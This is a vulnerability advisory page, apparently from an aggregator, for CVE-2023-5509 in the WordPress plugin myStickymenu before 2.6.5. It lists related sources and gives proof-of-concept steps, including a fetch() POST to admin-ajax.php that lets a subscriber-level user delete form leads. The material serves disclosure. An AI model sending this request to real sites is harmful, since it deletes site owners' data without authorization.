myStickymenu v2.6.5 - Subscriber+ Arbitrary Form Leads Deletio
Reporter | Title | Published | Views | Family All 6 |
---|---|---|---|---|
![]() | CVE-2023-5509 | 20 Nov 202319:15 | – | cve |
![]() | CVE-2023-5509 | 20 Nov 202319:15 | – | nvd |
![]() | WordPress My Sticky Bar Plugin < 2.6.5 Improper Authorization Vulnerability | 21 Nov 202300:00 | – | openvas |
![]() | CVE-2023-5509 myStickymenu < 2.6.5 - Subscriber+ Arbitrary Form Leads Deletion | 20 Nov 202318:55 | – | cvelist |
![]() | Design/Logic Flaw | 20 Nov 202319:15 | – | prion |
![]() | myStickymenu < 2.6.5 - Subscriber+ Arbitrary Form Leads Deletion | 27 Oct 202300:00 | – | wpvulndb |
1. Visit myStickymenu > + Create new Welcome Bar. Ensure "Collect leads" is enabled, enable the toggle at the top, and Save.
2. In a logged-out window, fill the lead form in the sticky bar. As an admin, confirm that a lead has been generated, and take note of the ID.
3. Log in as a subscriber and visit the frontend. Run the following code, replacing LEAD_ID with the ID of the generated lead from the previous step.
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": 'action=my_sticky_menu_bulks&bulks[]=3&wpnonce=' + welcomebar_frontjs.ajax_nonce,
"method": "POST",
"mode": "cors",
"credentials": "include"
});
3. See that the lead has been deleted.
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo